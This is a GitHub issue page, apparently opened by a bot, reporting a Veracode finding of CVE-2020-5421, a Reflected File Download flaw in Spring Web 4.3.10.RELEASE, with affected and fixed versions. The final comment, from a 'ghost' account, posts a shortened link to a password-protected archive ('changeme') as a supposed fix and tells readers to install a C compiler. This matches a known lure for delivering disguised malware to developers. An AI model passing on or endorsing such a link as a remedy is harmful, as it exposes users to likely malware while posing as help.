julz0815 / test-action

0 stars 1 forks source link

CVE: 2020-5421 found in Spring Web - Version: 4.3.10.RELEASE [JAVA] #1199

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Web
Description Spring Web
Language JAVA
Vulnerability Reflected File Download (RFD) Attack
Vulnerability description spring-web is vulnerable to Reflected File Download (RFD) attack. An incomplete fix of CVE-2015-5211 allows an attacker to bypass the protection against RFD attack via the jsessionid path parameter.
CVE 2020-5421
CVSS score 3.6
Vulnerability present in version/s 4.3.0.RELEASE-4.3.28.RELEASE
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 4.3.29.RELEASE
Library latest version 6.2.0-RC1
Fix

Links:

ghost commented 1 month ago

maybe this will help

https://bit.ly/3zo8fAM Archive password: changeme

you may need to install the c compiler